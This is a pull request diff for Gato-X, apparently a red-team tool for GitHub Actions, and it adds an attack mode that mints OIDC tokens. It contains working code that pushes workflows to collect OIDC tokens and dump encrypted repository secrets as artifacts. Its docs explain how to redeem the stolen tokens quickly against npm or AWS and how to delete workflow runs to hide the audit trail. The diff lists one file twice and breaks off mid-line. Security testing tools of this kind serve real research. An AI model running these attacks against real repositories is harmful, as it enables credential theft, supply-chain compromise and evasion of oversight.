### PR TITLE
feat(attack): Add attack feature to mint OIDC tokens.

### DIFF
--- a/.github/workflows/pytest.yaml
+++ b/.github/workflows/pytest.yaml
@@ -31,12 +31,15 @@ jobs:
       - run: |
           python -m pip install --upgrade pip
           pip install ".[test,mcp]"
-      - name: Format check with black
-        uses: psf/black@05f0a8ce1f71fbb36e1e032d3b518c7b945089a2 # 25.11.0
       - name: Lint with ruff
         uses: astral-sh/ruff-action@57714a7c8a2e59f32539362ba31877a1957dded1 # v3.5.1
         with:
           src: "./gatox"
+      - name: Format check with ruff
+        uses: astral-sh/ruff-action@57714a7c8a2e59f32539362ba31877a1957dded1 # v3.5.1
+        with:
+          src: "./gatox"
+          args: "format --check"
       - name: Type check with pyright
         run: pyright
       - name: Test with Pytest

--- a/.pre-commit-config.yaml
+++ b/.pre-commit-config.yaml
@@ -1,15 +1,10 @@
 repos:
-  - repo: https://github.com/psf/black
-    rev: 25.11.0
-    hooks:
-      - id: black
-        language_version: python3
-
   - repo: https://github.com/astral-sh/ruff-pre-commit
     rev: v0.11.12
     hooks:
       - id: ruff
         args: [--fix]
+      - id: ruff-format
 
   - repo: https://github.com/RobertCraigie/pyright-python
     rev: v1.1.408

--- a/docs/user-guide/advanced/index.md
+++ b/docs/user-guide/advanced/index.md
@@ -13,3 +13,4 @@ For use cases, see the [Use Cases](../use-cases/index.md).
 - [Complex Attack Scenarios](complex-attacks.md) - Advanced attack techniques and scenarios
 - [Continuous Scanning](continuous-scanning.md) - Using Gato-X for Continuous Scanning
 - [GitHub Fine-Grained Personal Access Tokens](fine-grained-tokens.md) - Using Gato-X with Fine-Grained GitHub Tokens
+- [OIDC Token Exchange](oidc.md) - Minting GitHub Actions OIDC tokens to pivot into third-party services

--- a/docs/user-guide/advanced/oidc.md
+++ b/docs/user-guide/advanced/oidc.md
@@ -1,0 +1,55 @@
+# OIDC Token Exchange
+
+GitHub Actions can mint short-lived OpenID Connect (OIDC) tokens that workflows exchange with third-party services (AWS, GCP, Azure, npm, Vault, PyPI, sigstore, etc.) for cloud credentials or publish rights. When a user with `workflow` write access compromises a repository — or is the repository — Gato-X's `--oidc` attack mode mints those tokens on demand and exfiltrates them so they can be replayed against the trusting third party.
+
+## How the Attack Works
+
+`gato-x attack --oidc` pushes a workflow that:
+
+1. Requests an OIDC token from `$ACTIONS_ID_TOKEN_REQUEST_URL` for the audience supplied via `--oidc-audience`.
+2. Writes the JWT to an artifact (`oidc_token.txt`).
+3. Optionally fans out across one or more GitHub Actions environments via a job matrix (`--environments`), so each environment-bound token (with its `sub` claim referencing that environment) is minted in a single run.
+
+Once the workflow completes, Gato-X downloads the artifact, prints the raw JWT, and decodes the claims (`iss`, `aud`, `sub`, `repository`, `environment`, `ref`, ...). Use these claims to determine which trust policies on the third party will accept the token.
+
+## Token Lifetime
+
+**The minted JWT is valid for ~5 minutes from issuance, regardless of whether the GitHub Actions workflow run is still running, has completed, or has been deleted.**
+
+This is the property that makes the attack interesting: the token is a bearer credential issued by `token.actions.githubusercontent.com` and signed with GitHub's OIDC signing key. Once minted, its validity is determined entirely by its `iat` / `exp` claims and the third party's trust policy — not by whether the originating workflow is still active. Deleting the workflow run (`-d`) after exfiltration removes the audit trail in the Actions tab but does **not** revoke the token.
+
+Practical consequences:
+
+- After exfiltration you have roughly 5 minutes to redeem the token at the target service (`sts:AssumeRoleWithWebIdentity`, `npm publish --provenance`, etc.). Plan the follow-on action before launching the attack.
+- If the target third party caches the resulting credential (e.g. AWS returns 1-hour STS session credentials), the downstream credential outlives the OIDC token. Trade up immediately.
+- Re-running the attack mints a fresh token — there is no per-token rate limit beyond the normal Actions concurrency.
+
+## Environments and the `sub` Claim
+
+Many trust policies pin on the `sub` claim, which by default encodes `repo:OWNER/REPO:ref:refs/heads/BRANCH` but changes shape when the job binds to an environment (`repo:OWNER/REPO:environment:ENV_NAME`). Use `--environments` / `-ev` to mint one token per environment in a single workflow run; each artifact is uploaded under a sanitized name and Gato-X labels the printed token with the original environment name.
+
+Environment names containing characters that GitHub disallows in artifact names (`" : < > | * ? \ / \r \n`) are automatically sanitized for the artifact name only — the workflow still binds to the real environment, so the resulting `sub` claim is unchanged.
+
+## Required Permissions
+
+- A token with `repo` + `workflow` scopes (classic PAT) **or** a fine-grained PAT with `contents:write` + `workflows:write` on the target repo.
+- The repository must allow `id-token: write` permission for workflows. Public repos on the free plan support this by default; private/internal repos depend on org policy.
+
+## Example
+
+```bash
+GH_TOKEN=$(gh auth token) gato-x a --oidc \
+  -oa "npm:registry.npmjs.org" \
+  -t MyOrg/MyRepo \
+  --file-name release \
+  -d \
+  -ev "NPM | CLI" "Production"
+```
+
+This mints two tokens — one bound to the `NPM | CLI` environment, one to `Production` — both with audience `npm:registry.npmjs.org`, and deletes the workflow run after exfiltration.
+
+## Defensive Notes
+
+- Trust policies on third parties should pin `repository`, `repository_owner`, and ideally `environment` and `ref` — never just `repository_owner` alone.
+- Require environment protection rules (required reviewers, branch restrictions) on any environment whose `sub` claim grants production access.
+- Treat any actor who can push a workflow file as someone who can mint every OIDC token the workflow is allowed to request. Limit `workflow` scope on PATs accordingly.

--- a/docs/user-guide/command-reference/attack.md
+++ b/docs/user-guide/command-reference/attack.md
@@ -32,6 +32,7 @@ gato-x a [options]
 | `--workflow`, `-w` | Attack by pushing a workflow to a feature branch |
 | `--runner-on-runner`, `-pr` | Attack with Runner-on-Runner via a Fork Pull Request |
 | `--secrets`, `-sc` | Attack to exfiltrate pipeline secrets |
+| `--oidc`, `-oi` | Attack to mint a GitHub Actions OIDC token for a chosen audience |
 | `--interact` | Connect to a C2 repository and interact with connected runners |
 | `--payload-only` | Generate payloads for manually deploying runner on runner |
 
@@ -44,6 +45,15 @@ gato-x a [options]
 | `--file-name`, `-fn` | Name of yaml file without extension |
 | `--custom-file`, `-f` | Path to a yaml workflow to upload |
 | `--delete-run`, `-d` | Delete the resulting workflow run |
+
+### OIDC Attack Options
+
+| Option | Description |
+|--------|-------------|
+| `--oidc-audience`, `-oa` | OIDC audience value for the token request. Defaults to `sigstore` |
+| `--environments`, `-ev` | One or more GitHub Actions environments to mint tokens for (uses a job matrix) |
+| `--runner-override`, `-ro` | Runner labels to use instead of `ubuntu-latest` |
+| `--file-name`, `-fn` | Required for OIDC attacks — name of the workflow yaml without extension |
 
 ### Runner-on-Runner Options
 
@@ -76,6 +86,14 @@ gato-x a --workflow --target MyOrg/MyRepo --command "whoami"
 ```bash
 gato-x a --secrets --target MyOrg/MyRepo
 ```
+
+### Mint an OIDC Token for a Third-Party Audience
+
+```bash
+gato-x a --oidc -oa "npm:registry.npmjs.org" -t MyOrg/MyRepo --file-name release -d -ev "NPM | CLI" "Production"
+```
+
+This requests an OIDC token from each listed environment and prints the token plus its decoded claims. See [OIDC Token Exchange](../advanced/oidc.md) for details on how the token can be used after the workflow finishes.
 
 ### Generate Runner-on-Runner Payload Only
 

--- a/gatox/attack/attack.py
+++ b/gatox/attack/attack.py
@@ -97,7 +97,7 @@ class Attacker:
         target_repo: str,
         branch: str,
         yaml_contents: str,
-        commit_message: str,
+        commit_message: str | None,
         yaml_name: str,
     ):
         """Utility method to wrap shared logic for pushing a workflow for a new
@@ -116,6 +116,7 @@ class Attacker:
         """
 
         workflow_id = None
+        message = commit_message or "Test Commit"
 
         if self.author_email and self.author_name:
             rev_hash = await self.api.commit_workflow(
@@ -125,7 +126,7 @@ class Attacker:
                 f"{yaml_name}.yml",
                 commit_author=self.author_name,
                 commit_email=self.author_email,
-                message=commit_message,
+                message=message,
             )
         else:
             rev_hash = await self.api.commit_workflow(
@@ -133,7 +134,7 @@ class Attacker:
                 branch,
                 yaml_contents.encode(),
                 f"{yaml_name}.yml",
-                message=commit_message,
+                message=message,
             )
 
         if not rev_hash:

--- a/gatox/attack/oidc/oidc_attack.py
+++ b/gatox/attack/oidc/oidc_attack.py
@@ -17,6 +17,7 @@ limitations under the License.
 import asyncio
 import json
 import random
+import re
 import string
 from base64 import b64decode
 
@@ -24,6 +25,13 @@ import yaml
 
 from gatox.attack.attack import Attacker
 from gatox.cli.output import Output
+
+_INVALID_ARTIFACT_CHARS = re.compile(r'[":<>|*?\\/\r\n]')
+
+
+def _sanitize_artifact_suffix(value: str) -> str:
+    """Replace characters disallowed in GitHub artifact names with '_'."""
+    return _INVALID_ARTIFACT_CHARS.sub("_", value)
 
 
 class OIDCAttack(Attacker):
@@ -49,7 +57,7 @@ class OIDCAttack(Attacker):
         yaml_file["on"] = {"push": {"branches": branch_name}}
         yaml_file["permissions"] = {"id-token": "write", "contents": "read"}
 
-        artifact_name = "files-${{ matrix.environment }}" if environments else "files"
+        artifact_name = "files-${{ matrix.safe_name }}" if environments else "files"
 
         test_job = {
             "runs-on": runner or ["ubuntu-latest"],
@@ -74,7 +82,11 @@ class OIDCAttack(Attacker):
         }
 
         if environments:
-            test_job["strategy"] = {"matrix": {"environment": environments}}
+            matrix_include = [
+                {"environment": env, "safe_name": _sanitize_artifact_suffix(env)}
+                for env in environments
+            ]
+            test_job["strategy"] = {"matrix": {"include": matrix_include}}
             test_job["environment"] = "${{ matrix.environment }}"
 
         yaml_file["jobs"] = {"testing": test_job}
@@ -157,7 +169,11 @@ class OIDCAttack(Attacker):
                 return
 
             if environments:
-                expected = {f"files-{env}" for env in environments}
+                artifact_to_env = {
+                    f"files-{_sanitize_artifact_suffix(env)}": env
+                    for env in environments
+                }
+                expected = set(artifact_to_env.keys())
                 all_artifacts = {}
                 for _ in range(30):
                     all_artifacts = await self.api.retrieve_all_workflow_artifacts(
@@ -170,10 +186,13 @@ class OIDCAttack(Attacker):
                 missing = expected - all_artifacts.keys()
                 if missing:
                     Output.error(
-                        f"Artifacts missing for environment(s): {', '.join(missing)}"
+                        "Artifacts missing for environment(s): "
+                        f"{', '.join(artifact_to_env[m] for m in missing)}"
                     )
 
-                self.__present_tokens_from_artifacts(all_artifacts, expected - missing)
+                self.__present_tokens_from_artifacts(
+                    all_artifacts, expected - missing, artifact_to_env
+                )
             else:
                 artifact = None
                 for _ in range(30):
@@ -191,7 +210,9 @@ class OIDCAttack(Attacker):
                         "repository may not support OIDC."
                     )
                 else:
-                    self.__present_tokens_from_artifacts({"files": artifact}, {"files"})
+                    self.__present_tokens_from_artifacts(
+                        {"files": artifact}, {"files"}, {}
+                    )
 
             if delete_action and (
                 not finegrain_scopes or "actions:write" in finegrain_scopes
@@ -206,12 +227,16 @@ class OIDCAttack(Attacker):
                 "The user does not have the necessary scopes to conduct this attack!"
             )
 
-    def __present_tokens_from_artifacts(self, artifacts: dict, names: set):
+    def __present_tokens_from_artifacts(
+        self, artifacts: dict, names: set, artifact_to_env: dict
+    ):
         """Print de-duplicated OIDC tokens from the given artifacts.
 
         Args:
             artifacts (dict): {artifact_name: {filename: bytes}}
             names (set): Artifact names to process.
+            artifact_to_env (dict): Map from sanitized artifact name to the
+                original environment label for display.
         """
         seen_tokens: set[str] = set()
 
@@ -224,7 +249,7 @@ class OIDCAttack(Attacker):
                 continue
             seen_tokens.add(token)
 
-            env_label = name.removeprefix("files-") if name != "files" else None
+            env_label = artifact_to_env.get(name) if name != "files" else None
             header = (
                 f"OIDC Token [{Output.bright(env_label)}] Retrieved:"
                 if env_label

--- a/gatox/attack/oidc/oidc_attack.py
+++ b/gatox/attack/oidc/oidc_attack.py
@@ -1,0 +1,243 @@
+"""
+Copyright 2025, Adnan Khan
+
+Licensed under the Apache License, Version 2.0 (the "License");
+you may not use this file except in compliance with the License.
+You may obtain a copy of the License at
+
+    http://www.apache.org/licenses/LICENSE-2.0
+
+Unless required by applicable law or agreed to in writing, software
+distributed under the License is distributed on an "AS IS" BASIS,
+WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+See the License for the specific language governing permissions and
+limitations under the License.
+"""
+
+import asyncio
+import json
+import random
+import string
+from base64 import b64decode
+
+import yaml
+
+from gatox.attack.attack import Attacker
+from gatox.cli.output import Output
+
+
+class OIDCAttack(Attacker):
+    """Attack class to demonstrate OIDC token exchange via GitHub Actions."""
+
+    @staticmethod
+    def create_oidc_exfil_yaml(
+        branch_name: str,
+        audience: str,
+        environments: list[str] | None = None,
+        runner: list[str] | None = None,
+    ):
+        """Create a workflow YAML that requests an OIDC token and uploads it as an artifact.
+
+        Args:
+            branch_name (str): Branch name for the on: push trigger.
+            audience (str): OIDC audience value for the token request.
+            environments (list[str] | None): Optional list of environments to
+                target via a job matrix.
+        """
+        yaml_file = {}
+        yaml_file["name"] = branch_name
+        yaml_file["on"] = {"push": {"branches": branch_name}}
+        yaml_file["permissions"] = {"id-token": "write", "contents": "read"}
+
+        artifact_name = "files-${{ matrix.environment }}" if environments else "files"
+
+        test_job = {
+            "runs-on": runner or ["ubuntu-latest"],
+            "steps": [
+                {
+                    "name": "Get OIDC Token",
+                    "run": (
+                        f'OIDC_TOKEN=$(curl -sH "Authorization: bearer $ACTIONS_ID_TOKEN_REQUEST_TOKEN"'
+                        f' "$ACTIONS_ID_TOKEN_REQUEST_URL&audience={audience}" | jq -r .value)\n'
+                        'echo "$OIDC_TOKEN" > oidc_token.txt\n'
+                    ),
+                },
+                {
+                    "name": "Upload artifacts",
+                    "uses": "actions/upload-artifact@v4",
+                    "with": {
+                        "name": artifact_name,
+                        "path": "oidc_token.txt",
+                    },
+                },
+            ],
+        }
+
+        if environments:
+            test_job["strategy"] = {"matrix": {"environment": environments}}
+            test_job["environment"] = "${{ matrix.environment }}"
+
+        yaml_file["jobs"] = {"testing": test_job}
+
+        return yaml.dump(yaml_file, sort_keys=False)
+
+    @staticmethod
+    def _decode_jwt_claims(token: str):
+        """Decode JWT payload claims without verification."""
+        parts = token.split(".")
+        if len(parts) != 3:
+            return None
+        payload = parts[1]
+        payload += "=" * (4 - len(payload) % 4)
+        payload = payload.replace("-", "+").replace("_", "/")
+        return json.loads(b64decode(payload))
+
+    async def oidc_exfil(
+        self,
+        target_repo: str,
+        target_branch: str | None,
+        commit_message: str | None,
+        delete_action: bool,
+        yaml_name: str,
+        audience: str,
+        finegrain_scopes: set | None = None,
+        environments: list[str] | None = None,
+        runner: list[str] | None = None,
+    ):
+        """Demonstrate OIDC token exchange by extracting a GitHub Actions OIDC token.
+
+        Args:
+            target_repo (str): Repository to target.
+            target_branch (str | None): Branch to create workflow in.
+            commit_message (str | None): Commit message for the attack workflow.
+            delete_action (bool): Whether to delete the workflow run after execution.
+            yaml_name (str): Name of the yaml file to use.
+            audience (str): OIDC audience for the token request.
+            finegrain_scopes (set | None): Fine-grained PAT scopes if applicable.
+            environments (list[str] | None): Environments to target via job matrix.
+            runner (list[str] | None): Runner labels. Defaults to ubuntu-latest.
+        """
+        if finegrain_scopes is None:
+            finegrain_scopes = set()
+        await self.setup_user_info()
+
+        if not self.user_perms:
+            return False
+
+        if (
+            "repo" in self.user_perms["scopes"]
+            and "workflow" in self.user_perms["scopes"]
+        ) or (
+            "workflows:write" in finegrain_scopes
+            and "contents:write" in finegrain_scopes
+        ):
+            if target_branch:
+                branch = target_branch
+            else:
+                branch = "".join(random.choices(string.ascii_lowercase, k=10))
+
+            res = await self.api.get_repo_branch(target_repo, branch)
+            if res == -1:
+                Output.error("Failed to check for remote branch!")
+                return
+            elif res == 1:
+                Output.error(f"Remote branch, {branch}, already exists!")
+                return
+
+            Output.info(
+                f"Requesting OIDC token with audience: {Output.bright(audience)}"
+            )
+            yaml_contents = self.create_oidc_exfil_yaml(
+                branch, audience, environments, runner
+            )
+            workflow_id = await self.execute_and_wait_workflow(
+                target_repo, branch, yaml_contents, commit_message, yaml_name
+            )
+            if not workflow_id:
+                return
+
+            if environments:
+                expected = {f"files-{env}" for env in environments}
+                all_artifacts = {}
+                for _ in range(30):
+                    all_artifacts = await self.api.retrieve_all_workflow_artifacts(
+                        target_repo, workflow_id
+                    )
+                    if expected.issubset(all_artifacts.keys()):
+                        break
+                    await asyncio.sleep(1)
+
+                missing = expected - all_artifacts.keys()
+                if missing:
+                    Output.error(
+                        f"Artifacts missing for environment(s): {', '.join(missing)}"
+                    )
+
+                self.__present_tokens_from_artifacts(all_artifacts, expected - missing)
+            else:
+                artifact = None
+                for _ in range(30):
+                    artifact = await self.api.retrieve_workflow_artifact(
+                        target_repo, workflow_id
+                    )
+                    if artifact and "oidc_token.txt" in artifact:
+                        break
+                    await asyncio.sleep(1)
+
+                if not artifact or "oidc_token.txt" not in artifact:
+                    Output.error(
+                        "Failed to retrieve OIDC token artifact! "
+                        "The workflow may lack 'id-token: write' permission or the "
+                        "repository may not support OIDC."
+                    )
+                else:
+                    self.__present_tokens_from_artifacts({"files": artifact}, {"files"})
+
+            if delete_action and (
+                not finegrain_scopes or "actions:write" in finegrain_scopes
+            ):
+                res = await self.api.delete_workflow_run(target_repo, workflow_id)
+                if not res:
+                    Output.error("Failed to delete workflow!")
+                else:
+                    Output.result("Workflow deleted successfully!")
+        else:
+            Output.error(
+                "The user does not have the necessary scopes to conduct this attack!"
+            )
+
+    def __present_tokens_from_artifacts(self, artifacts: dict, names: set):
+        """Print de-duplicated OIDC tokens from the given artifacts.
+
+        Args:
+            artifacts (dict): {artifact_name: {filename: bytes}}
+            names (set): Artifact names to process.
+        """
+        seen_tokens: set[str] = set()
+
+        for name in names:
+            files = artifacts.get(name, {})
+            if "oidc_token.txt" not in files:
+                continue
+            token = files["oidc_token.txt"].decode().strip()
+            if token in seen_tokens:
+                continue
+            seen_tokens.add(token)
+
+            env_label = name.removeprefix("files-") if name != "files" else None
+            header = (
+                f"OIDC Token [{Output.bright(env_label)}] Retrieved:"
+                if env_label
+                else "OIDC Token Retrieved:"
+            )
+            Output.owned(header)
+            print(token)
+
+            try:
+                claims = self._decode_jwt_claims(token)
+                if claims:
+                    Output.result("Token Claims:")
+                    for k, v in claims.items():
+                        print(f"  {k}: {v}")
+            except Exception:
+                pass

--- a/gatox/attack/secrets/secrets_attack.py
+++ b/gatox/attack/secrets/secrets_attack.py
@@ -90,7 +90,7 @@ class SecretsAttack(Attacker):
         yaml_file["name"] = branch_name
         yaml_file["on"] = {"push": {"branches": branch_name}}
 
-        artifact_name = "files-${{ matrix.environment }}" if environments else "files"
+        artifact_name = "files-${{ matrix.safe_name }}" if environments else "files"
 
         test_job = {
             "runs-on": runner or ["ubuntu-latest"],
@@ -125,7 +125,13 @@ EOF
         }
 
         if environments:
-            test_job["strategy"] = {"matrix": {"environment": environments}}
+            from gatox.attack.oidc.oidc_attack import _sanitize_artifact_suffix
+
+            matrix_include = [
+                {"environment": env, "safe_name": _sanitize_artifact_suffix(env)}
+                for env in environments
+            ]
+            test_job["strategy"] = {"matrix": {"include": matrix_include}}
             test_job["environment"] = "${{ matrix.environment }}"
 
         yaml_file["jobs"] = {"testing": test_job}
@@ -238,7 +244,13 @@ EOF
             # Retry artifact retrieval - artifacts may not be immediately
             # available after workflow completion
             if environments:
-                expected = {f"files-{env}" for env in environments}
+                from gatox.attack.oidc.oidc_attack import _sanitize_artifact_suffix
+
+                artifact_to_env = {
+                    f"files-{_sanitize_artifact_suffix(env)}": env
+                    for env in environments
+                }
+                expected = set(artifact_to_env.keys())
                 all_artifacts = {}
                 for _ in range(30):
                     all_artifacts = await self.api.retrieve_all_workflow_artifacts(
@@ -251,7 +263,8 @@ EOF
                 missing = expected - all_artifacts.keys()
                 if missing:
                     Output.error(
-                        f"Artifacts missing for environment(s): {', '.join(missing)}"
+                        "Artifacts missing for environment(s): "
+                        f"{', '.join(artifact_to_env[m] for m in missing)}"
                     )
 
                 self.__present_secrets_from_artifacts(

--- a/gatox/attack/secrets/secrets_attack.py
+++ b/gatox/attack/secrets/secrets_attack.py
@@ -70,26 +70,30 @@ class SecretsAttack(Attacker):
         return secret_names
 
     @staticmethod
-    def create_environment_exfil_yaml(pubkey: str, branch_name: str, environment: str):
-        raise NotImplementedError
-
-    @staticmethod
-    def create_exfil_yaml(pubkey: str, branch_name):
+    def create_exfil_yaml(
+        pubkey: str,
+        branch_name: str,
+        environments: list[str] | None = None,
+        runner: list[str] | None = None,
+    ):
         """Create a malicious yaml file that will trigger on push and attempt
         to exfiltrate the provided list of secrets.
 
         Args:
             pubkey (str): Public key to encrypt the plaintext values with.
             branch_name (str): Name of the branch for on: push trigger.
-
+            environments (list[str] | None): Optional list of environments to
+                target via a job matrix.
         """
         yaml_file = {}
 
         yaml_file["name"] = branch_name
         yaml_file["on"] = {"push": {"branches": branch_name}}
 
+        artifact_name = "files-${{ matrix.environment }}" if environments else "files"
+
         test_job = {
-            "runs-on": ["ubuntu-latest"],
+            "runs-on": runner or ["ubuntu-latest"],
             "steps": [
                 {
                     "env": {"VALUES": "${{ toJSON(secrets)}}"},
@@ -107,18 +111,23 @@ EOF
                     "openssl enc -aes-256-cbc -pbkdf2 -in output.json -out output_updated.json -pass pass:$aes_key;"
                     'echo $aes_key | openssl rsautl -encrypt -pkcs -pubin -inkey <(echo "$PUBKEY") -out lookup.txt 2> /dev/null;',
                 },
-                # Upload the encrypted files as workfow run artifacts.
+                # Upload the encrypted files as workflow run artifacts.
                 # This avoids the edge case where there is a secret set to a value that is in the Base64 (which breaks everything).
                 {
                     "name": "Upload artifacts",
                     "uses": "actions/upload-artifact@v4",
                     "with": {
-                        "name": "files",
+                        "name": artifact_name,
                         "path": " |\noutput_updated.json\nlookup.txt",
                     },
                 },
             ],
         }
+
+        if environments:
+            test_job["strategy"] = {"matrix": {"environment": environments}}
+            test_job["environment"] = "${{ matrix.environment }}"
+
         yaml_file["jobs"] = {"testing": test_job}
 
         return yaml.dump(yaml_file, sort_keys=False)
@@ -160,23 +169,26 @@ EOF
     async def secrets_dump(
         self,
         target_repo: str,
-        target_branch: str,
-        commit_message: str,
+        target_branch: str | None,
+        commit_message: str | None,
         delete_action: bool,
         yaml_name: str,
         finegrain_scopes: set | None = None,
+        environments: list[str] | None = None,
+        runner: list[str] | None = None,
     ):
         """Given a user with write access to a repository, runs a workflow that
         dumps all repository secrets.
 
         Args:
             target_repo (str): Repository to target.
-            target_branch (str): Branch to create workflow in.
-            commit_message (str): Commit message for exfil workflow.
-            delete_action (bool): Whether to delete the workflow after
-            execution.
+            target_branch (str | None): Branch to create workflow in.
+            commit_message (str | None): Commit message for exfil workflow.
+            delete_action (bool): Whether to delete the workflow after execution.
             yaml_name (str): Name of yaml to use for exfil workflow.
-
+            finegrain_scopes (set | None): Fine-grained PAT scopes if applicable.
+            environments (list[str] | None): Environments to target via job matrix.
+            runner (list[str] | None): Runner labels. Defaults to ubuntu-latest.
         """
         if finegrain_scopes is None:
             finegrain_scopes = set()
@@ -214,7 +226,9 @@ EOF
                 Output.error(f"Remote branch, {branch}, already exists!")
                 return
             priv_key, pubkey_pem = self.__create_private_key()
-            yaml_contents = self.create_exfil_yaml(pubkey_pem, branch)
+            yaml_contents = self.create_exfil_yaml(
+                pubkey_pem, branch, environments, runner
+            )
             workflow_id = await self.execute_and_wait_workflow(
                 target_repo, branch, yaml_contents, commit_message, yaml_name
             )
@@ -223,43 +237,52 @@ EOF
 
             # Retry artifact retrieval - artifacts may not be immediately
             # available after workflow completion
-            res = None
-            for _ in range(30):
-                res = await self.api.retrieve_workflow_artifact(
-                    target_repo, workflow_id
-                )
-                if res and "output_updated.json" in res and "lookup.txt" in res:
-                    break
-                await asyncio.sleep(1)
+            if environments:
+                expected = {f"files-{env}" for env in environments}
+                all_artifacts = {}
+                for _ in range(30):
+                    all_artifacts = await self.api.retrieve_all_workflow_artifacts(
+                        target_repo, workflow_id
+                    )
+                    if expected.issubset(all_artifacts.keys()):
+                        break
+                    await asyncio.sleep(1)
 
-            if not res or not ("output_updated.json" in res and "lookup.txt" in res):
-                Output.error(
-                    "Failed to retrieve workflow artifact! "
-                    "Artifacts may not have been uploaded."
+                missing = expected - all_artifacts.keys()
+                if missing:
+                    Output.error(
+                        f"Artifacts missing for environment(s): {', '.join(missing)}"
+                    )
+
+                self.__present_secrets_from_artifacts(
+                    priv_key, all_artifacts, expected - missing
                 )
             else:
-                # Carve files out of the zipfile.
+                artifact = None
+                for _ in range(30):
+                    artifact = await self.api.retrieve_workflow_artifact(
+                        target_repo, workflow_id
+                    )
+                    if (
+                        artifact
+                        and "output_updated.json" in artifact
+                        and "lookup.txt" in artifact
+                    ):
+                        break
+                    await asyncio.sleep(1)
 
-                # lookup.txt is the encrypted AES key
-                # output_updated.json is the AES encrypted json blob
-
-                cleartext = self.__decrypt_secrets(
-                    priv_key, res["lookup.txt"], res["output_updated.json"]
-                )
-                Output.owned("Decrypted and Decoded Secrets:")
-                secrets = json.loads(cleartext)
-
-                # Filter out github_token which is always present
-                extracted = {k: v for k, v in secrets.items() if k != "github_token"}
-
-                if not extracted:
-                    Output.warn(
-                        "No secrets were extracted. Org secrets are not "
-                        "accessible to public repos on the free plan."
+                if not artifact or not (
+                    "output_updated.json" in artifact and "lookup.txt" in artifact
+                ):
+                    Output.error(
+                        "Failed to retrieve workflow artifact! "
+                        "Artifacts may not have been uploaded."
                     )
                 else:
-                    for k, v in extracted.items():
-                        print(f"{k}={v}")
+                    self.__present_secrets_from_artifacts(
+                        priv_key, {"files": artifact}, {"files"}
+                    )
+
             if delete_action and (
                 not finegrain_scopes or "actions:write" in finegrain_scopes
             ):
@@ -271,4 +294,45 @@ EOF
         else:
             Output.error(
                 "The user does not have the necessary scopes to conduct this attack!"
+            )
+
+    def __present_secrets_from_artifacts(
+        self,
+        priv_key,
+        artifacts: dict,
+        names: set,
+    ):
+        """Decrypt artifacts and print de-duplicated secrets.
+
+        Args:
+            priv_key: RSA private key for decryption.
+            artifacts (dict): {artifact_name: {filename: bytes}}
+            names (set): Artifact names to process.
+        """
+        # Collect unique (key, value) pairs across all artifacts
+        seen: set[tuple] = set()
+        any_extracted = False
+
+        Output.owned("Decrypted and Decoded Secrets:")
+        for name in names:
+            files = artifacts.get(name, {})
+            if "output_updated.json" not in files or "lookup.txt" not in files:
+                continue
+            cleartext = self.__decrypt_secrets(
+                priv_key, files["lookup.txt"], files["output_updated.json"]
+            )
+            secrets = json.loads(cleartext)
+            for k, v in secrets.items():
+                if k == "github_token":
+                    continue
+                pair = (k, v)
+                if pair not in seen:
+                    seen.add(pair)
+                    print(f"{k}={v}")
+                    any_extracted = True
+
+        if not any_extracted:
+            Output.warn(
+                "No secrets were extracted. Org secrets are not "
+                "accessible to public repos on the free plan."
             )

--- a/gatox/cli/attack/config.py
+++ b/gatox/cli/attack/config.py
@@ -1,3 +1,5 @@
+import argparse
+
 from gatox.cli.output import Output
 from gatox.util.arg_utils import ReadableFile, StringType
 
@@ -86,6 +88,43 @@ def configure_parser_attack(parser):
     )
 
     parser.add_argument(
+        "--runner-override",
+        "-ro",
+        metavar="LABEL",
+        help="One or more runner labels to use instead of ubuntu-latest.\n"
+        "Useful for targeting self-hosted runners.",
+        nargs="+",
+        type=StringType(256),
+    )
+
+    parser.add_argument(
+        "--environments",
+        "-ev",
+        metavar="ENVIRONMENT",
+        help="One or more GitHub Actions environments to target.\n"
+        "A job matrix is used so each environment runs independently,\n"
+        "and results are de-duplicated before display.",
+        nargs="+",
+        type=StringType(256),
+    )
+
+    parser.add_argument(
+        "--oidc",
+        "-oi",
+        help="Attack to demonstrate OIDC token exchange.",
+        action="store_true",
+    )
+
+    parser.add_argument(
+        "--oidc-audience",
+        "-oa",
+        metavar="AUDIENCE",
+        help="OIDC audience value for the token request.\nDefaults to 'sigstore'",
+        default="sigstore",
+        type=StringType(256),
+    )
+
+    parser.add_argument(
         "--source-branch",
         "-sb",
         default="test",
@@ -116,9 +155,10 @@ def configure_parser_attack(parser):
     parser.add_argument(
         "--file-name",
         "-fn",
-        default="test",
+        default=argparse.SUPPRESS,
         help=f"Name of yaml file {Output.bright('without extension')} that will be\n"
-        "written as part of either attack type. Defaults to 'test'",
+        "written as part of either attack type. Defaults to 'test'.\n"
+        f"Required for {Output.bright('--oidc')} attacks.",
         type=StringType(64),
     )
 

--- a/gatox/cli/cli.py
+++ b/gatox/cli/cli.py
@@ -7,6 +7,7 @@ from pathlib import Path
 from colorama import Fore, Style
 
 from gatox.attack.attack import Attacker
+from gatox.attack.oidc.oidc_attack import OIDCAttack
 from gatox.attack.persistence.persistence_attack import PersistenceAttack
 from gatox.attack.runner.webshell import WebShell
 from gatox.attack.secrets.secrets_attack import SecretsAttack
@@ -131,8 +132,7 @@ def validate_arguments(args, parser):
         # Regular commands need GH_TOKEN
         if "GH_TOKEN" not in os.environ:
             gh_token = input(
-                "No 'GH_TOKEN' environment variable set! Please enter a GitHub"
-                " PAT.\n"
+                "No 'GH_TOKEN' environment variable set! Please enter a GitHub PAT.\n"
             )
         else:
             gh_token = os.environ["GH_TOKEN"]
@@ -180,12 +180,13 @@ async def attack(args, parser):
         args.workflow
         or args.runner_on_runner
         or args.secrets
+        or args.oidc
         or args.interact
         or args.payload_only
     ):
         parser.error(
             f"{Fore.RED}[!] You must select one of the attack modes, "
-            "workflow, runner_on_runner, secrets, or interact."
+            "workflow, runner_on_runner, secrets, oidc, or interact."
         )
 
     if args.custom_file and (args.command or args.name):
@@ -197,6 +198,12 @@ async def attack(args, parser):
     if args.secrets and args.command:
         parser.error(f"{Fore.RED}[!] A command cannot be used with secrets exfil!.")
 
+    if args.oidc and args.command:
+        parser.error(f"{Fore.RED}[!] A command cannot be used with OIDC exfil!.")
+
+    if args.oidc and not hasattr(args, "file_name"):
+        parser.error(f"{Fore.RED}[!] --file-name is required for OIDC attacks.")
+
     if args.runner_on_runner and args.command:
         parser.error(
             f"{Fore.RED}[!] A command cannot be used with runner-on-runner attacks!."
@@ -205,6 +212,8 @@ async def attack(args, parser):
     if not args.custom_file:
         args.command = args.command if args.command else "whoami"
         args.name = args.name if args.name else "test"
+        if not hasattr(args, "file_name"):
